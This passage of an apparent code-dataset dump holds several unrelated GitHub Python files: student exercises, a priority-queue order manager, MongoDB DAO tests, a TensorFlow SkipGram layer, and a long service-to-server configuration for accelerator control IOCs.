8080)\n\n\n\n\t\n","repo_name":"cgfb94/plantproj","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27096947052","text":"n = int(input(\"Enter the length of the sequence: \"))\n\nnum_1 = 1\nnum_2 = 2\nnum_3 = 3\n\nfor i in range(1, n+1):\n if 1 <= i <= 3:\n print(i, end=\", \")\n else:\n new_num = num_1+num_2+num_3\n num_1 = num_2\n num_2 = num_3\n num_3 = new_num\n print(num_3, end=\", \")\n\n","repo_name":"DongusJr/Verkefni_HR_2019_Haust","sub_path":"Undirbuningur_lokapróf/assignment_5/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28654368224","text":"import json\r\nfrom dstruct.order import Order\r\nfrom dstruct.priority_queue import PriorityQueue\r\n\r\n\r\nclass OrderManager:\r\n\r\n def __init__(self):\r\n self.order_queue = PriorityQueue()\r\n\r\n def read_json(self, filename):\r\n\r\n f = open(filename)\r\n order_data = json.load(f)\r\n\r\n # Iterating through the json data\r\n for id in order_data.keys():\r\n id_keys = order_data[id].keys()\r\n\r\n # Check if order_date, priority, and quantity are keys\r\n # if \"order_date\" in id_keys and \"priority\" in id_keys and \"quantity\" in id_keys:\r\n try:\r\n order = Order(order_data[id][\"order_date\"].strip(),\r\n order_data[id][\"priority\"].strip(),\r\n order_data[id][\"quantity\"])\r\n\r\n try:\r\n self.order_queue.enqueue(order)\r\n except Exception as e:\r\n # THERE ARE 8 INVALID FIELDS\r\n print(type(e).__name__, ': ', str(e), \"Order ID:\", id, \">>\", order_data[id], sep=\" \")\r\n\r\n except Exception as e:\r\n # THERE ARE 5 KEY ERRORS\r\n print(type(e).__name__, ': ', str(e), \"Order ID:\", id, \">>\", order_data[id], sep=\" \")\r\n\r\n def print_info(self):\r\n # Output order data\r\n print(\"Order Data:\", self.order_queue)\r\n\r\n # There 87 orders in the order queue\r\n print(\"Order Queue Size\", self.order_queue.size())\r\n\r\n\r\ndef main():\r\n om = OrderManager()\r\n om.read_json(\"orders.json\")\r\n om.print_info()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"xaneeshax/DS-NEU","sub_path":"Advanced Programming/outputs/order_manager.py","file_name":"order_manager.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16775425065","text":"from src.dao.version_dao import VersionDao\nfrom src.models.version_model import VersionModel\n\ndefault_version = 'v001_data_init'\ndefault_version_dict = {\n 'version': default_version\n}\n\n\ndef test_version_dao_inserts_record(mongo_db):\n version_model = _build_version_model()\n version_dao = VersionDao(mongo_db)\n\n version_id = version_dao.insert(version_model)\n\n # cleanup\n assert version_dao.delete_one(version_model.version)\n\n assert version_id\n\n\ndef test_version_does_not_find_record(mongo_db):\n version_dao = VersionDao(mongo_db)\n result = version_dao.find_one(default_version)\n\n assert result is None\n\n\ndef test_version_does_find_record(mongo_db):\n version = _build_version_model()\n version_dao = VersionDao(mongo_db)\n\n expected_version_id = version_dao.insert(version)\n\n result_version = version_dao.find_one(default_version)\n\n # cleanup\n assert version_dao.delete_one(default_version)\n\n assert expected_version_id == str(result_version._id)\n\n\ndef test_version_dao_delete_no_record(mongo_db):\n version_dao = VersionDao(mongo_db)\n deleted_count = version_dao.delete_one(default_version)\n assert 0 == deleted_count\n\n\ndef test_version_dao_deletes_record(mongo_db):\n version = _build_version_model()\n version_dao = VersionDao(mongo_db)\n version_dao.insert(version)\n\n deleted_count = version_dao.delete_one(default_version)\n\n assert 1 == deleted_count\n\n\ndef _build_version_model() -> VersionModel:\n version_model = VersionModel.from_json(default_version_dict)\n\n return version_model\n","repo_name":"DEV3L/python-heroku-learning-journal-api","sub_path":"src/dao/version_dao_test.py","file_name":"version_dao_test.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13682560028","text":"import tensorflow as tf\n\n\n# ------------- task 2.2 \"Model\" -------------------\nclass SkipGram(tf.keras.layers.Layer):\n \"\"\"A custom SkipGram layer\"\"\"\n\n def __init__(self, vocabulary_size, embedding_size):\n \"\"\" Constructor \"\"\"\n super(SkipGram, self).__init__()\n\n # Initialize vocabulary and embedding size.\n self.vocabulary_size = vocabulary_size\n self.embedding_size = embedding_size\n self.build(\"\")\n\n def build(self, input_shape) -> None:\n \"\"\"Instantiation of weights and bias\n\n :param input_shape: shape for weights and bias creation.\n \"\"\"\n\n # initialize the embedding and score matrices of correct shape by using vocabulary and embedding size.\n self.embedding_weights = self.add_weight(\n shape=(self.vocabulary_size, self.embedding_size),\n initializer='random_normal')\n\n self.score_weights = self.add_weight(\n shape=(self.vocabulary_size, self.embedding_size),\n initializer='random_normal')\n\n self.score_bias = self.add_weight(\n shape=(self.vocabulary_size,),\n initializer='zeros')\n\n @tf.function\n def call(self, inputs: tf.Tensor, target: tf.Tensor) -> tf.Tensor:\n \"\"\"Forward propagation\n\n :param inputs: Inputs for layer.\n \"\"\"\n\n # get the embeddings using tf.nn.embedding_lookup()\n embedding = tf.nn.embedding_lookup(self.embedding_weights, inputs)\n\n # calculate and return the loss using tf.nn.nce_loss\n loss = tf.nn.nce_loss(\n weights=self.score_weights,\n biases=self.score_bias,\n labels=target,\n inputs=embedding,\n num_classes=self.vocabulary_size,\n num_sampled=3\n\n )\n\n return tf.reduce_mean(loss)\n","repo_name":"pondreka/IANNswtf","sub_path":"hw_10/skipgram.py","file_name":"skipgram.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3377433580","text":"#!/usr/bin/env python-sirius\n\nimport os\nimport yaml\nfrom siriuspy import util\nfrom siriuspy.namesys import SiriusPVName as _PVName\nfrom siriuspy.search import PSSearch, HLTimeSearch, IDSearch\nfrom siriuspy.currinfo.csdev import get_currinfo_database\nfrom siriuspy.diagsys.rfdiag.csdev import Const as RFDiagConst\nfrom siriuspy.diagsys.lidiag.csdev import Const as LIDiagConst\n\n\nclass ServiceConfig:\n \"\"\"Services configuration.\"\"\"\n\n SERVICES_CSCONSTS = {\n 'csconsts': 'IA-16RaBbB-CO-IOCSrv'\n }\n\n SERVICES = {\n 'as-ap-currinfo': 'IA-14RaDiag03-CO-IOCSrv',\n 'as-ap-machshift': 'IA-16RaBbB-CO-IOCSrv',\n 'as-ap-diag': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'as-ap-opticscorr': 'CA-RaTim-CO-IOCSrv',\n 'as-ap-posang': 'IA-16RaBbB-CO-IOCSrv',\n 'as-ap-sofb': 'CA-RaTim-CO-IOCSrv',\n 'as-ap-injctrl': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'as-ps-dclinks-tbts-bodip': 'IA-16RaBbB-CO-IOCSrv',\n 'as-ps-dclinks-ia01': 'CA-RaTim-CO-IOCSrv',\n 'as-ps-dclinks-ia02': 'CA-RaTim-CO-IOCSrv',\n 'as-ps-dclinks-ia03': 'IA-18RaDiag04-CO-IOCSrv',\n 'as-ps-dclinks-ia04': 'CA-RaTim-CO-IOCSrv',\n 'as-ps-dclinks-ia05': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'as-ps-dclinks-ia06': 'CA-RaTim-CO-IOCSrv',\n 'as-ps-dclinks-ia07': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'as-ps-dclinks-ia08': 'IA-18RaDiag04-CO-IOCSrv',\n 'as-ps-dclinks-ia09': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'as-ps-dclinks-ia10': 'IA-16RaBbB-CO-IOCSrv',\n 'as-ps-dclinks-ia11': 'IA-16RaBbB-CO-IOCSrv',\n 'as-ps-dclinks-ia12': 'CA-RaTim-CO-IOCSrv',\n 'as-ps-dclinks-ia13': 'IA-18RaDiag04-CO-IOCSrv',\n 'as-ps-dclinks-ia14': 'IA-18RaDiag04-CO-IOCSrv',\n 'as-ps-dclinks-ia15': 'IA-18RaDiag04-CO-IOCSrv',\n 'as-ps-dclinks-ia16': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'as-ps-dclinks-ia17': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'as-ps-dclinks-ia18': 'CA-RaTim-CO-IOCSrv',\n 'as-ps-dclinks-ia19': 'IA-18RaDiag04-CO-IOCSrv',\n 'as-ps-dclinks-ia20': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'as-pu-conv': 'IA-14RaDiag03-CO-IOCSrv',\n 'as-ti-general': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'bo-ti-bpms-corrs': 'CA-RaTim-CO-IOCSrv',\n 'si-ti-bpms-corrs': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ti-trims-skews': 'IA-18RaDiag04-CO-IOCSrv',\n 'li-ap-energy': 'IA-14RaDiag03-CO-IOCSrv',\n 'li-ps-spect-quads-lens': 'IA-16RaBbB-CO-IOCSrv',\n 'li-ps-corrs': 'IA-16RaBbB-CO-IOCSrv',\n 'li-ps-slnds': 'IA-14RaDiag03-CO-IOCSrv',\n 'li-ps-conv': 'IA-14RaDiag03-CO-IOCSrv',\n 'li-ps-diag': 'IA-16RaBbB-CO-IOCSrv',\n 'tb-ps-dips': 'IA-18RaDiag04-CO-IOCSrv',\n 'tb-ps-quads': 'IA-18RaDiag04-CO-IOCSrv',\n 'tb-ps-corrs': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-dips': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-quads': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'bo-ps-sexts': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-corrs-ia01': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-corrs-ia02': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-corrs-ia04': 'CA-RaTim-CO-IOCSrv',\n 'bo-ps-corrs-ia05': 'CA-RaTim-CO-IOCSrv',\n 'bo-ps-corrs-ia07': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-corrs-ia08': 'IA-16RaBbB-CO-IOCSrv',\n 'bo-ps-corrs-ia10': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'bo-ps-corrs-ia11': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-corrs-ia13': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-corrs-ia14': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-corrs-ia16': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'bo-ps-corrs-ia17': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'bo-ps-corrs-ia20': 'CA-RaTim-CO-IOCSrv',\n 'ts-ps-dips': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'ts-ps-quads': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'ts-ps-corrs': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ap-fofb': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ap-stabinfo': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-id-conv': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-id-epu50': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ap-sofb': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-dips': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-quads-qfq': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-quads-qd': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-sexts-sda12b2-sfa0p0-sda0p0': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-sexts-sfa12-sda3p1-sfb0-sdb01': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ps-sexts-sfb12-sdb3-sfp12-sdp23': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ps-corrs-c2m12-ia01': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c2m12-ia02': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia03': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c2m12-ia04': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia05': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia06': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia07': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia08': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia09': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c2m12-ia10': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia11': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia12': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia13': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c2m12-ia14': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia15': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia16': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c2m12-ia17': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia18': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia19': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia20': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-corrs-c134-ia01': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c134-ia02': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ps-corrs-c134-ia03': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c134-ia04': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c134-ia05': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c134-ia06': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c134-ia07': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c134-ia08': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-corrs-c134-ia09': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c134-ia10': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-corrs-c134-ia11': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-corrs-c134-ia12': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c134-ia13': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c134-ia14': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-corrs-c134-ia15': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c134-ia16': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-corrs-c134-ia17': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-corrs-c134-ia18': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c134-ia19': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-corrs-c134-ia20': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-qs-sb-ia10': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-corrs-sa-ia17': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia01': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia02': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia03': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia04': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia05': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia06': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-m12-ia07': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-m12-ia08': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-m12-ia09': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia10': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia11': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ps-trims-qs-m12-ia12': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia13': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-m12-ia14': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-m12-ia15': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-m12-ia16': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia17': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-m12-ia18': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-m12-ia19': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia20': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia01': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia02': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia03': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia04': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia05': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia06': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia07': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia08': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia09': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia10': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia11': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia12': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ps-trims-qs-c1234-ia13': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia14': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia15': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia16': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia17': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia18': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia19': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia20': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-conv-fastcorrs-ia01': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia02': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia03': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia04': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia05': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia06': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia07': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia08': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia09': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia10': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia11': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia12': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia13': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-conv-fastcorrs-ia14': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-conv-fastcorrs-ia15': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-conv-fastcorrs-ia16': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-conv-fastcorrs-ia17': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-conv-fastcorrs-ia18': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-conv-fastcorrs-ia19': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-conv-fastcorrs-ia20': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-diag-fastcorrs': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'it-ps-lens': 'IA-18RaDiag04-CO-IOCSrv',\n 'bl-ap-imgproc': 'LA-RaCtrl-CO-Srv-1',\n 'si-ap-idff-epu50': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ap-idff-papu50': 'IA-18RaDiag04-CO-IOCSrv',\n }\n\n STACKS = {\n 'as-ps-dclinks': {\n 'tbts-bodip': 'as-ps-dclinks-tbts-bodip',\n 'ia01': 'as-ps-dclinks-ia01',\n 'ia02': 'as-ps-dclinks-ia02',\n 'ia03': 'as-ps-dclinks-ia03',\n 'ia04': 'as-ps-dclinks-ia04',\n 'ia05': 'as-ps-dclinks-ia05',\n 'ia06': 'as-ps-dclinks-ia06',\n 'ia07': 'as-ps-dclinks-ia07',\n 'ia08': 'as-ps-dclinks-ia08',\n 'ia09': 'as-ps-dclinks-ia09',\n 'ia10': 'as-ps-dclinks-ia10',\n 'ia11': 'as-ps-dclinks-ia11',\n 'ia12': 'as-ps-dclinks-ia12',\n 'ia13': 'as-ps-dclinks-ia13',\n 'ia14': 'as-ps-dclinks-ia14',\n 'ia15': 'as-ps-dclinks-ia15',\n 'ia16': 'as-ps-dclinks-ia16',\n 'ia17': 'as-ps-dclinks-ia17',\n 'ia18': 'as-ps-dclinks-ia18',\n 'ia19': 'as-ps-dclinks-ia19',\n 'ia20': 'as-ps-dclinks-ia20',\n },\n 'as-ti': {\n 'general': 'as-ti-general',\n 'bo-bpms-corrs': 'bo-ti-bpms-corrs',\n 'si-bpms-corrs': 'si-ti-bpms-corrs',\n 'si-trims-skews': 'si-ti-trims-skews',\n },\n 'bo-ps-corrs': {\n 'ia01': 'bo-ps-corrs-ia01',\n 'ia02': 'bo-ps-corrs-ia02',\n 'ia04': 'bo-ps-corrs-ia04',\n 'ia05': 'bo-ps-corrs-ia05',\n 'ia07': 'bo-ps-corrs-ia07',\n 'ia08': 'bo-ps-corrs-ia08',\n 'ia10': 'bo-ps-corrs-ia10',\n 'ia11': 'bo-ps-corrs-ia11',\n 'ia13': 'bo-ps-corrs-ia13',\n 'ia14': 'bo-ps-corrs-ia14',\n 'ia16': 'bo-ps-corrs-ia16',\n 'ia17': 'bo-ps-corrs-ia17',\n 'ia20': 'bo-ps-corrs-ia20',\n },\n 'bo-ps-fams': {\n 'dips': 'bo-ps-dips',\n 'quads': ('bo-ps-quads', ('dips', )),\n 'sexts': ('bo-ps-sexts', ('dips', )),\n },\n 'bo-ps': {\n 'dips': 'bo-ps-dips',\n 'quads': ('bo-ps-quads', ('dips', )),\n 'sexts': ('bo-ps-sexts', ('dips', )),\n 'corrs-ia01': ('bo-ps-corrs-ia01', ('dips', )),\n 'corrs-ia02': ('bo-ps-corrs-ia02', ('dips', )),\n 'corrs-ia04': ('bo-ps-corrs-ia04', ('dips', )),\n 'corrs-ia05': ('bo-ps-corrs-ia05', ('dips', )),\n 'corrs-ia07': ('bo-ps-corrs-ia07', ('dips', )),\n 'corrs-ia08': ('bo-ps-corrs-ia08', ('dips', )),\n 'corrs-ia10': ('bo-ps-corrs-ia10', ('dips', )),\n 'corrs-ia11': ('bo-ps-corrs-ia11', ('dips', )),\n 'corrs-ia13': ('bo-ps-corrs-ia13', ('dips', )),\n 'corrs-ia14': ('bo-ps-corrs-ia14', ('dips', )),\n 'corrs-ia16': ('bo-ps-corrs-ia16', ('dips', )),\n 'corrs-ia17': ('bo-ps-corrs-ia17', ('dips', )),\n 'corrs-ia20': ('bo-ps-corrs-ia20', ('dips', )),\n },\n 'li-ps': {\n 'spect-quads-lens': 'li-ps-spect-quads-lens',\n 'corrs': 'li-ps-corrs',\n 'slnds': 'li-ps-slnds',\n 'conv': ('li-ps-conv', ('spect-quads-lens', 'corrs', 'slnds')),\n 'diag': ('li-ps-diag', ('spect-quads-lens', 'corrs', 'slnds')),\n },\n 'tb-ps': {\n 'dips': 'tb-ps-dips',\n 'quads': ('tb-ps-quads', ('dips', )),\n 'corrs': ('tb-ps-corrs', ('dips', )),\n },\n 'ts-ps': {\n 'dips': 'ts-ps-dips',\n 'quads': ('ts-ps-quads', ('dips', )),\n 'corrs': ('ts-ps-corrs', ('dips', )),\n },\n 'si-ps': {\n 'dips': 'si-ps-dips',\n 'quads-qd': ('si-ps-quads-qd', ('dips', )),\n 'quads-qfq': ('si-ps-quads-qfq', ('dips', )),\n 'sexts-sda12b2-sfa0p0-sda0p0': ('si-ps-sexts-sda12b2-sfa0p0-sda0p0', ('dips', )),\n 'sexts-sfa12-sda3p1-sfb0-sdb01': ('si-ps-sexts-sfa12-sda3p1-sfb0-sdb01', ('dips', )),\n 'sexts-sfb12-sdb3-sfp12-sdp23': ('si-ps-sexts-sfb12-sdb3-sfp12-sdp23', ('dips', )),\n 'corrs-c2m12-ia01': ('si-ps-corrs-c2m12-ia01', ('dips', )),\n 'corrs-c2m12-ia02': ('si-ps-corrs-c2m12-ia02', ('dips', )),\n 'corrs-c2m12-ia03': ('si-ps-corrs-c2m12-ia03', ('dips', )),\n 'corrs-c2m12-ia04': ('si-ps-corrs-c2m12-ia04', ('dips', )),\n 'corrs-c2m12-ia05': ('si-ps-corrs-c2m12-ia05', ('dips', )),\n 'corrs-c2m12-ia06': ('si-ps-corrs-c2m12-ia06', ('dips', )),\n 'corrs-c2m12-ia07': ('si-ps-corrs-c2m12-ia07', ('dips', )),\n 'corrs-c2m12-ia08': ('si-ps-corrs-c2m12-ia08', ('dips', )),\n 'corrs-c2m12-ia09': ('si-ps-corrs-c2m12-ia09', ('dips', )),\n 'corrs-c2m12-ia10': ('si-ps-corrs-c2m12-ia10', ('dips', )),\n 'corrs-c2m12-ia11': ('si-ps-corrs-c2m12-ia11', ('dips', )),\n 'corrs-c2m12-ia12': ('si-ps-corrs-c2m12-ia12', ('dips', )),\n 'corrs-c2m12-ia13': ('si-ps-corrs-c2m12-ia13', ('dips', )),\n 'corrs-c2m12-ia14': ('si-ps-corrs-c2m12-ia14', ('dips', )),\n 'corrs-c2m12-ia15': ('si-ps-corrs-c2m12-ia15', ('dips', )),\n 'corrs-c2m12-ia16': ('si-ps-corrs-c2m12-ia16', ('dips', )),\n 'corrs-c2m12-ia17': ('si-ps-corrs-c2m12-ia17', ('dips', )),\n 'corrs-c2m12-ia18': ('si-ps-corrs-c2m12-ia18', ('dips', )),\n 'corrs-c2m12-ia19': ('si-ps-corrs-c2m12-ia19', ('dips', )),\n 'corrs-c2m12-ia20': ('si-ps-corrs-c2m12-ia20', ('dips', )),\n 'corrs-c134-ia01': ('si-ps-corrs-c134-ia01', ('dips', )),\n 'corrs-c134-ia02': ('si-ps-corrs-c134-ia02', ('dips', )),\n 'corrs-c134-ia03': ('si-ps-corrs-c134-ia03', ('dips', )),\n 'corrs-c134-ia04': ('si-ps-corrs-c134-ia04', ('dips', )),\n 'corrs-c134-ia05': ('si-ps-corrs-c134-ia05', ('dips', )),\n 'corrs-c134-ia06': ('si-ps-corrs-c134-ia06', ('dips', )),\n 'corrs-c134-ia07': ('si-ps-corrs-c134-ia07', ('dips', )),\n 'corrs-c134-ia08': ('si-ps-corrs-c134-ia08', ('dips', )),\n 'corrs-c134-ia09': ('si-ps-corrs-c134-ia09', ('dips', )),\n 'corrs-c134-ia10': ('si-ps-corrs-c134-ia10', ('dips', )),\n 'corrs-c134-ia11': ('si-ps-corrs-c134-ia11', ('dips', )),\n 'corrs-c134-ia12': ('si-ps-corrs-c134-ia12', ('dips', )),\n 'corrs-c134-ia13': ('si-ps-corrs-c134-ia13', ('dips', )),\n 'corrs-c134-ia14': ('si-ps-corrs-c134-ia14', ('dips', )),\n 'corrs-c134-ia15': ('si-ps-corrs-c134-ia15', ('dips', )),\n 'corrs-c134-ia16': ('si-ps-corrs-c134-ia16', ('dips', )),\n 'corrs-c134-ia17': ('si-ps-corrs-c134-ia17', ('dips', )),\n 'corrs-c134-ia18': ('si-ps-corrs-c134-ia18', ('dips', )),\n 'corrs-c134-ia19': ('si-ps-corrs-c134-ia19', ('dips', )),\n 'corrs-c134-ia20': ('si-ps-corrs-c134-ia20', ('dips', )),\n 'corrs-qs-sb-ia10': ('si-ps-corrs-qs-sb-ia10', ('dips', )),\n 'corrs-sa-ia17': ('si-ps-corrs-sa-ia17', ('dips', )),\n 'trims-qs-c1234-ia01': ('si-ps-trims-qs-c1234-ia01', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia02': 